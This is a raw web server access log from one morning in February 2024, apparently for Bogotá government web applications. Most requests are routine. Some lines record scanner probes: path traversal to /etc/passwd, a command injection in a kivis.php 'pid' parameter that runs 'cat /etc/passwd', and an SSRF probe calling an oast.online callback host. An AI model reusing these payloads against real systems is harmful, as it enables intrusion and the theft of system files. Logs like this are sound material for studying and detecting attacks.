201.245.192.253 - - [28/Feb/2024:02:20:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
190.158.201.175 - - [28/Feb/2024:02:20:18 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40413
190.158.201.175 - - [28/Feb/2024:02:20:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:20:22 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:20:22 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:20:23 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:20:23 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:20:24 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
201.245.192.253 - - [28/Feb/2024:02:20:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33539
152.32.180.98 - - [28/Feb/2024:02:20:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/accordion.min.js?ver=1.11.4 HTTP/1.1" 200 8584
152.32.180.98 - - [28/Feb/2024:02:20:53 -0500] "GET /portaldeninos/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1 HTTP/1.1" 200 10056
152.32.180.98 - - [28/Feb/2024:02:20:53 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/animations/animations.min.js?ver=20.9.6 HTTP/1.1" 200 1896
152.32.180.98 - - [28/Feb/2024:02:20:53 -0500] "GET /portaldeninos/wp-content/themes/betheme/assets/jplayer/jplayer.min.js?ver=20.9.6 HTTP/1.1" 200 52702
152.32.180.98 - - [28/Feb/2024:02:20:54 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/menu.js?ver=20.9.6 HTTP/1.1" 200 2449
152.32.180.98 - - [28/Feb/2024:02:20:54 -0500] "GET /portaldeninos/wp-includes/js/wp-embed.min.js?ver=4.9.8 HTTP/1.1" 200 1398
152.32.180.98 - - [28/Feb/2024:02:20:55 -0500] "GET /portaldeninos/wp-includes/js/jquery/ui/sortable.min.js?ver=1.11.4 HTTP/1.1" 200 24899
152.32.180.98 - - [28/Feb/2024:02:20:55 -0500] "GET /portaldeninos/wp-content/themes/betheme/js/scripts.js?ver=20.9.6 HTTP/1.1" 200 77162
66.249.66.21 - - [28/Feb/2024:02:20:58 -0500] "GET /isolucionsda/FrameSetArticulo.asp?Pagina=/ISOlucionSDA/bancoconocimiento/D/Decreto692deMarzo29de1994/Decreto692deMarzo29de1994.asp?IdArticulo=496 HTTP/1.1" 200 527
190.158.201.175 - - [28/Feb/2024:02:21:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5139
190.158.201.175 - - [28/Feb/2024:02:21:10 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 151933
190.158.201.175 - - [28/Feb/2024:02:21:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:21:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:21:13 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:21:13 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
201.245.192.253 - - [28/Feb/2024:02:21:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
152.61.128.50 - - [28/Feb/2024:02:21:41 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?request=GetCapabilities&service=WMS HTTP/1.1" 503 1020
152.61.128.50 - - [28/Feb/2024:02:21:42 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?SERVICE=WMS&REQUEST=GetCapabilities HTTP/1.1" 503 1020
152.61.128.50 - - [28/Feb/2024:02:21:42 -0500] "GET /arcgis/services/Calidad_del_Agua_WQI/MapServer/WMSServer?WMTVER=1.0.0&REQUEST=capabilities HTTP/1.1" 503 1020
152.32.180.98 - - [28/Feb/2024:02:21:50 -0500] "GET /portaldeninos/ HTTP/1.1" 200 110175
201.245.192.253 - - [28/Feb/2024:02:21:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:21:58 -0500] "GET /BLA/boletinlegal/..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252F..%252Fetc%252Fpasswd%23foo/development HTTP/1.1" 404 1038
216.245.221.92 - - [28/Feb/2024:02:21:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:22:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:21:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
123.252.48.79 - - [28/Feb/2024:02:22:54 -0500] "POST /EemAdminService/EemAdmin HTTP/1.1" 404 1034
123.252.48.79 - - [28/Feb/2024:02:23:23 -0500] "\x16\x03\x01" 400 226
172.22.2.4 - - [28/Feb/2024:02:23:24 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
123.252.48.79 - - [28/Feb/2024:02:23:30 -0500] "POST /api/jsonws/invoke HTTP/1.1" 404 1403
172.22.2.4 - - [28/Feb/2024:02:21:59 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53419
201.245.192.253 - - [28/Feb/2024:02:23:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:02:23:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/0248.pdf HTTP/1.1" 200 380908
201.245.192.253 - - [28/Feb/2024:02:24:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:02:24:39 -0500] "GET /BLA/resoluciones/AUTOS%202023/0115.pdf HTTP/1.1" 200 435285
172.22.2.4 - - [28/Feb/2024:02:23:26 -0500] "GET /BLA/boletinlegal/index.php HTTP/1.1" 200 60380
123.252.48.79 - - [28/Feb/2024:02:25:21 -0500] "GET /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; HTTP/1.1" 404 1022
146.19.24.28 - - [28/Feb/2024:02:25:22 -0500] "GET / HTTP/1.1" 200 319
216.244.66.195 - - [28/Feb/2024:02:25:27 -0500] "GET /BLA/resoluciones/AUTOS%202023/0139.pdf HTTP/1.1" 200 658809
199.16.157.182 - - [28/Feb/2024:02:25:47 -0500] "GET /images/presentaci%C3%B3n%20convenci%C3%B3n.jpg HTTP/1.1" 404 1034
199.16.157.182 - - [28/Feb/2024:02:25:48 -0500] "GET /bogota-lista-para-ser-la-sede-de-la-ii-convencion-internacional-de-emergencia-climatica.html HTTP/1.1" 200 934
201.245.192.253 - - [28/Feb/2024:02:25:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:26:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.244.66.195 - - [28/Feb/2024:02:26:26 -0500] "GET /BLA/resoluciones/AUTOS%202023/0549.pdf HTTP/1.1" 200 432298
201.245.192.253 - - [28/Feb/2024:02:26:37 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
123.252.48.79 - - [28/Feb/2024:02:26:53 -0500] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cneqhp1enjjce7r1g3tg76zoo3esair9r.oast.online%23 HTTP/1.1" 404 1022
216.245.221.92 - - [28/Feb/2024:02:26:59 -0500] "HEAD / HTTP/1.1" 200 -
114.119.135.199 - - [28/Feb/2024:02:27:01 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS%2B2019/ HTTP/1.1" 200 14291
216.244.66.195 - - [28/Feb/2024:02:27:17 -0500] "GET /BLA/resoluciones/AUTOS%202023/1179.pdf HTTP/1.1" 200 422839
172.22.2.4 - - [28/Feb/2024:02:27:22 -0500] "POST /BLA/boletinlegal/auth/requestreset HTTP/1.1" 404 1038
201.245.192.253 - - [28/Feb/2024:02:27:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
140.120.136.14 - - [28/Feb/2024:02:28:09 -0500] "GET /zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://cneqhp1enjjce7r1g3tgi3fffr3cm75o5.oast.online%23 HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:02:28:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:26:58 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.13.179 - - [28/Feb/2024:02:28:43 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1/4RKTwLLwsRYugWNo4pjQbod5kCXHg7WSvifeBN3vPuOIPzr1Y+isA&y=U2FsdGVkX19dh+1uIvZCEnnyO3PYVAP3psHqiAUysm8R2IuBx720kdx7DKKalyyb HTTP/1.1" 200 30
186.102.13.179 - - [28/Feb/2024:02:28:43 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19M2fJxTm4KUN+KmDPAvpCjAsPCRDK7A88SiW6WB3wyzwKkEE8ZWC7quD9qQxYy1sztYoG7esE1ee5Ts3fao4dSXTRO/eCadGU=&u=U2FsdGVkX18yf2tIWblkpuEa8VgqG8p5dk1Anq3UN2o=&y=U2FsdGVkX19dh+1uIvZCEnnyO3PYVAP3psHqiAUysm8R2IuBx720kdx7DKKalyyb HTTP/1.1" 200 97
186.102.13.179 - - [28/Feb/2024:02:28:43 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18z/5bv22gm7oU1JB2SU5UU1zGLA1VEawfJl3W/NDAoLD05XYDrSGbJXv2Jv8WrVIn6gmZ04ZN3TDhWRLO0yBS7YJJRFNZFR/AJ5MiFfmwFcF0pXuJZemNMQgm9Z9a8IR7boDUu+likvdzbk8+QlsQVtpXQBWZj3ddgun1HsnTeh66EPdjja619XoaH9s70yEacRHFA4YCpMJ6rsZ6mqpnETYahQW36Ho35NboZLs8ZZWgkezS9RCHt1sb0IvAkyZXn/spEgXgHzXIu1gN+FWECwRSZhCAtuLulzMsZKUBev/P+12YIpTdI14kElS206GMMmTIh0Wu8+HQhchi9pj+NTcUCRZ/GQ/NKXgdxizgP0L/lk1aJ7ugrGMgUfCXoUSdfXmKggOUJm/7vO4Gr2lBvVMKcc1TdrAYXsGRySafWPz3bF26uQl8X2GUiormSl9dbXDax7R4sy8kEfg4bs6NykFiYNjhR4m4aX9+W3nbgCQkj2b288E1vSEs7AyyfMnOlGwBCUmPU0iOxoyb1lpJMnRQnsAoz0wj7CD61+a0iJFbxUrPZvWAxy2ZpRcavUnhEWh8sbU4N2O9C6tHfy5gaaYJCTNP9JdRrtcYkoGSq53ZBjLTZK/7DdeGg60YOhKobvbESwH9i8p7A9j3b0QTcdFlbtAx1sAFvlwzjvPGATxf2+4x2LsBRjotox6lUxgpHNQTBg8Mx3eErE0+fy+M/XT1o4NsCfQ35YMzyU6sPX/qubh+nh99h5MNttgcFsyYochAkQ5hVGZz8qlOReyhUzrN9XtCGzTuemGXPfAPQcmwolokL1SbkckJ1LBxNNQCz77npp8kY1nOHlyWV//4xNR8+EaVxiiCJn7O5fB0z3yHsAEm6Tn6nZE6Sd5EreevlOJQJBCDaIkDKs6QWXBBgzbacO0oiHQ+IcTCQADiL2r8mrcQGAtDGpbSfaizRPCSb9IgMqyvaRjsqwwA8HktDpXXZ/NTx2csiD8cZcrY/lnDscuYi59L0znm5piwaGbn1hHvv/IV5fmhEOQNAYyaGTv2daQzF8w2xw5rrlPblWnJak5VC5kx4UO5cechhyD5TGhENgg/PbwaqKvCqB7FSKQE3k6M0Fh2Ox+ya3iNBrc7nmuairWpAr7ixsFTMvPd7WhbhuKfGJkCdL3VT0fYlI6jwByEvVcwWTGI8TmUfJx/O1n9X8tAU1e82t2sTAbUUSTA6TfxMgErX9ovgJxBuUjwnuHQjNb2v0P6FEkDZFI3P5YJZeWJCwcWjPDUnqr2Xeq/Aj+388fTNwH9OYBc5mdy8zq2jmtF/3JdOs4+L3qf65T53BQ2isXRECK9Bf6K2jW4f2S0Bu7q7iPxvUkmJ7N+cmUZuEpEja+1VEjvrTpQW7+CEq2k31fTYsQ6MtKePyfwA3DoAHQ7sYPSx2kNS6HrVu0Kprwbt5ZYfjBXCQaK1UyrpwZSeCbkCRgqYYWG9rt+jr68mJH50ubXCjXNLXW60OKf+jXLMxjfj3/MhODYItcjDAixHctZ6L9liDeVN65+U/0/tgt8K3fIYRk5Igo6Mkc4aWoRpknOMLJyeQLZrJG/THgzaXg9a3PjfBjm/Zwt9Xv515PfhVKep5YK/QcY/RloR0U1eS+pfW6HRkkz0IcROANdUz5hBgazHbLok/5ZIQhVNFF6ki0F6UZi/DpW3itf1y3fNFohZHuRwXE+HpYwBsk+TFxo8jBbm8kf1eaOetF8T3ViQCexQjQuZg1NYYEGQs94=&u=U2FsdGVkX18yf2tIWblkpuEa8VgqG8p5dk1Anq3UN2o=&y=U2FsdGVkX19dh+1uIvZCEnnyO3PYVAP3psHqiAUysm8R2IuBx720kdx7DKKalyyb HTTP/1.1" 200 1367
186.102.13.179 - - [28/Feb/2024:02:28:44 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+Bu4WIuqGstB7G/TJYkNtY2Zq6lCKHmS5ybj4K51dVd/7+0V6GjvhygT8GdRAEVo9jVrkc6vkBSHbtgoT/bylpcObwaYnpzJeF+r/1uNER4Tq8VQIAMoRhWeosdyPE3+OKUk6Ainy0suEQF4tzHA4f/AVmvRUUan7nfbQ6fmNF29WJrb7dSMck8Sn5d7hQTKenHUqpP9dqDaGyhEHjyEStSOU7BuZra3860dnw7P5cQd5AwDpStkheP3QM20A02wzvOzufmuvUfd0XyUSBV/o4sFBw3wj3PZJVSNlA+/YO0GbCHKpSdzjafwlBy8R/oUPtu+/ZseCgDNk6JQD6B8PUOkGsCfY6dlQTsWXw+ODUljvj7NWA11Hpo7ER1Or5fRRmWqV88fk9ulc+p1lxInNs3vG1zNA6A9gLDUIslB/FdgOPdC4kb3FolBOBR/S3l9A+NkM8mmqKv9fu9Lp2GbK8XBj8CQQ9KMeRzHLKg5QuxZEuLiBKfpXJF7zkt7tM36d4Vb3mue/EbbDbK0UUWVyvjBWhr9D8LP3um5ygm7xSQDsW/6rkaOf/YThcALCoJCDIz/mYZow/G46alJH77vdNQskY8pzH6wjZejSeWrnTfQM3WNLixBV5hfckTK28ZjjnPyUMAMc+9NTkpnSOlmQvVPGKx1wR+jIrzI5LQVwU4deBaliEydI+9KXXRRJwv7zkQK6T8slbbS1bpYGrkElpVXfVF3riQTOj+mH0YyD8DZ5/hvJ2q7sp&u=U2FsdGVkX18yf2tIWblkpuEa8VgqG8p5dk1Anq3UN2o=&y=U2FsdGVkX19dh+1uIvZCEnnyO3PYVAP3psHqiAUysm8R2IuBx720kdx7DKKalyyb HTTP/1.1" 200 208
186.102.13.179 - - [28/Feb/2024:02:28:44 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1/4RKTwLLwsRYugWNo4pjQbod5kCXHg7WSvifeBN3vPuOIPzr1Y+isA HTTP/1.1" 200 30244
172.22.2.4 - - [28/Feb/2024:02:27:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58720
140.120.136.14 - - [28/Feb/2024:02:29:47 -0500] "GET /metrics/v1/mbeans HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:02:29:46 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39465
201.245.192.253 - - [28/Feb/2024:02:29:49 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33539
201.245.192.253 - - [28/Feb/2024:02:29:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39611
201.245.192.253 - - [28/Feb/2024:02:30:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
40.77.167.65 - - [28/Feb/2024:02:30:12 -0500] "GET /guadalupe-aguanoso-y-otros-senderos-disponibles-para-el-disfrute-de-los-ciudadanos.html HTTP/1.1" 200 873
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:17 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:16 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 198531
190.158.201.175 - - [28/Feb/2024:02:30:21 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-bg_flat_0_2d5972_40x100.png?ln=primefaces-aristo HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:21 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40419
190.158.201.175 - - [28/Feb/2024:02:30:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:24 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:24 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:25 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:25 -0500] "GET /sipse/faces/javax.faces.resource/messages/messages.png?ln=primefaces&v=4.0 HTTP/1.1" 304 -
190.158.201.175 - - [28/Feb/2024:02:30:25 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:02:30:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33184
190.158.201.175 - - [28/Feb/2024:02:30:41 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33184
190.158.201.175 - - [28/Feb/2024:02:30:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
190.158.201.175 - - [28/Feb/2024:02:30:42 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1388
190.158.201.175 - - [28/Feb/2024:02:30:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31822
190.158.201.175 - - [28/Feb/2024:02:30:43 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 44009
190.158.201.175 - - [28/Feb/2024:02:30:46 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31549
201.245.192.253 - - [28/Feb/2024:02:30:47 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 33539
190.158.201.175 - - [28/Feb/2024:02:30:51 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31632
190.158.201.175 - - [28/Feb/2024:02:31:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 8103
162.55.175.138 - - [28/Feb/2024:02:31:24 -0500] "GET / HTTP/1.1" 200 4720
201.245.192.253 - - [28/Feb/2024:02:31:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
201.245.192.253 - - [28/Feb/2024:02:31:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
216.245.221.92 - - [28/Feb/2024:02:31:59 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Feb/2024:02:32:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:32:23 -0500] "POST /BLA/boletinlegal/os/mxperson HTTP/1.1" 404 1038
172.22.2.4 - - [28/Feb/2024:02:32:24 -0500] "POST /BLA/boletinlegal/meaweb/os/mxperson HTTP/1.1" 404 1038
123.6.49.41 - - [28/Feb/2024:02:32:48 -0500] "GET /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 302 -
123.6.49.41 - - [28/Feb/2024:02:32:48 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12408
123.6.49.18 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
123.6.49.47 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
123.6.49.50 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
123.6.49.50 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
123.6.49.41 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
123.6.49.9 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
123.6.49.18 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
123.6.49.50 - - [28/Feb/2024:02:32:50 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
123.6.49.18 - - [28/Feb/2024:02:32:49 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
123.6.49.41 - - [28/Feb/2024:02:32:50 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
123.6.49.47 - - [28/Feb/2024:02:32:50 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
123.6.49.47 - - [28/Feb/2024:02:32:53 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
123.6.49.41 - - [28/Feb/2024:02:32:53 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
123.6.49.18 - - [28/Feb/2024:02:32:53 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
123.6.49.18 - - [28/Feb/2024:02:32:54 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
123.6.49.18 - - [28/Feb/2024:02:32:54 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
140.120.136.14 - - [28/Feb/2024:02:33:21 -0500] "\x16\x03\x01" 400 226
201.245.192.253 - - [28/Feb/2024:02:33:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
140.120.136.14 - - [28/Feb/2024:02:33:58 -0500] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 1022
201.245.192.253 - - [28/Feb/2024:02:34:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Feb/2024:02:32:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
140.120.136.14 - - [28/Feb/2024:02:35:16 -0500] "POST /cgi-bin/mainfunction.cgi HTTP/1.1" 404 1034
172.22.2.4 - - [28/Feb/2024:02:33:39 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60730
66.249.66.20 - - [28/Feb/2024:02:35:22 -0500] "GET /Publicaciones/2024EE31913.pdf HTTP/1.1" 404 227
140.120.136.14 - - [28/Feb/2024:02:35:23 -0500] "GET /jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd HTTP/1.1" 404 1034
201.245.192.253 - - [28/Feb/2024:02:35:55 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d69ba41a1e83e54883a0bab3d468010a45.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:36:10 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d696a80f5c07824c829f57858935da15a1.e3iSbxaKaheRe34NaNuLc30MaN90n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
201.245.192.253 - - [28/Feb/2024:02:36:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 39446
216.245.221.92 - - [28/Feb/2024:02:36:59 -0500] "HEAD / HTTP/1.1" 200 -
